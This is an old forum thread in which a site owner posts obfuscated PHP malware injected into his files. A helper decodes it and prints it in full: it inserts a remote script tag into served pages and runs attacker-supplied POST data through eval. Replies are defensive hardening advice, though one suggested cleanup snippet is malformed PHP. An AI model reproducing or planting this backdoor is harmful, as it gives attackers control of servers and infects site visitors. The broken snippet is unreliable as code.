View previous topic :: View next topic |
Author |
Message |
spthai -
Joined: 16 Oct 2009 Posts: 5
|
Posted: Mon Oct 26, 2009 4:33 am Post subject: some weird script that look like a virus |
|
|
Have anyone ever had a weird script line that look like a virus, it looks something like this
jf;akjf;lkjf;lkdsajflksjkhj9werln, ljf ....and so on at the header of the files.
I think this is a hacking attempt. And google will filter your sites as a danger site.
If you guys ever experience this, then how you prevent the hacker for intruding your files again?
Thanks _________________ Cosmetic Surgery Thailand
Plastic Surgery Thailand |
|
Back to top |
|
|
Toasty -
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
|
Posted: Wed Oct 28, 2009 3:27 am Post subject: |
|
|
We're going to need more details. It's possible that it's an eval for a base64 statement. I'm guessing that's not an abstract of the actual code, hence why I need more of it to see. _________________ Audit the secure configuration of your server headers! |
|
Back to top |
|
|
spthai -
Joined: 16 Oct 2009 Posts: 5
|
Posted: Fri Nov 20, 2009 11:24 am Post subject: |
|
|
Quote: | <?php eval(base64_decode('aWYoIWlzc2V0KCRneTAxKSl7ZnVuY3Rpb24gZ3kwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZ1Ym5WaGNtbDBZUzV5WVdSdmJTNXdiQzlyYzJsbFoyRXZZMjkxYm5RdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBneTAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGd5MDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGd5MDEpKWNhbGxfdXNlcl9mdW5jKCRneTAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2d5MCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdneTAnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ3kwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ3kwMicpKSE9J2d5MDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
/* Short and sweet */ |
Here's the code... I still have problem preventing the hacker to come back and install the code on my files. He keep coming back and put the code back when I delete it.[/quote] _________________ Cosmetic Surgery Thailand
Plastic Surgery Thailand |
|
Back to top |
|
|
DonQuichote -
Joined: 24 Dec 2006 Posts: 68 Location: The Netherlands
|
Posted: Sun Nov 22, 2009 7:05 pm Post subject: Access |
|
|
Well, the hacker must get access somehow. It is up to you to investigate what possibilities the hacker has. Does the web server user have write access to the served directories? In that case, everything can be done through PHP. Simply deny the web server user that write access.
But it could also be that another service is hacked. If you have enabled root login for SSH, for example. What OS are you using? |
|
Back to top |
|
|
Toasty -
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
|
|
Back to top |
|
|
Toasty -
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
|
Posted: Wed Nov 25, 2009 5:33 pm Post subject: |
|
|
Update:
I'm not 100% sure what this script does, but I highly suggest you start checking your system for holes (file inclusion holes especially).
Here's the code that script executes:
Code: | <?PHP
if(!isset($gy01))
{
function gy0($s)
{
if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a="<script src=http://annuarita.radom.pl/ksiega/count.php ></script>",'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))$s.=$a;return $s;}
function gy02($a,$b,$c,$d)
{
global $gy01;$s=array();
if(function_exists($gy01))call_user_func($gy01,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='gy0')return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--)
{
$s[$i][1]=ob_get_contents();ob_end_clean();
}
ob_start('gy0');
for($i=0;$i<count($s);$i++)
{
ob_start($s[$i][0]);echo $s[$i][1];
}
}
}
$gy0l=(($a=@set_error_handler('gy02'))!='gy02')?$a:0;
eval(base64_decode($_POST['e']));
?> |
I DO NOT think this will run, because I'm sure (hope) that Aprelium has some character filters.
You'll notice the script URL in there, that was encoded again, even after the original encode, telling me that was "super secret!!!"
Well, I traced the link, and it is already known as a malicious site (see Google's Safe Browsing page (safe to click)).
One suggestions is you add a line to your header file, or do an auto_prepend in your php.ini to include code like this:
<?PHP
if file_exists("name_of_that_file.php")
{
unlink("name_of_that_file.php");
}
?>
That will delete it any time a PHP page is loaded -- including the script itself, should it be PHP.[/url] _________________ Audit the secure configuration of your server headers!
Last edited by Toasty on Wed Nov 25, 2009 5:35 pm; edited 1 time in total |
|
Back to top |
|
|
Toasty -
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
|
|
Back to top |
|
|
DonQuichote -
Joined: 24 Dec 2006 Posts: 68 Location: The Netherlands
|
Posted: Wed Nov 25, 2009 8:58 pm Post subject: Get rid of this now. |
|
|
The last line is the best:
Code: | eval(base64_decode($_POST['e'])); |
This will happily execute anything that the hacker wants on your server (unless you disabled the eval function). So I suggest you take it off-line and only bring it back up onece you really know you are safe. |
|
Back to top |
|
|
Toasty -
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
|
Posted: Wed Nov 25, 2009 9:08 pm Post subject: |
|
|
^Oops. I seen that line before too, failed to mention it.
Nice catch.
spthai, if you're running any "prefab" software (for example: Joomla, phpBB, Drupal, Invision, etc) could you let us know? If you include the versions, I can do some more looking around and see if there's a file inclusion hole, or an upload hole that can be exploited.
If the software you're using is built by yourself, make sure all variables provided from the client (REFERRER, POST, GET, COOKIE, REQUEST, and so on) are filtered at the beginning of the script (with regular expressions preferably).
The next step after the filtering would be to set:
register_globals = off;
In your PHP.INI. Apreliums pre-configured PHP packages ship with this option set to on, and while it is convenient, it's a serious security exploit -- and will be a removed feature once PHP 6 rolls out. _________________ Audit the secure configuration of your server headers! |
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|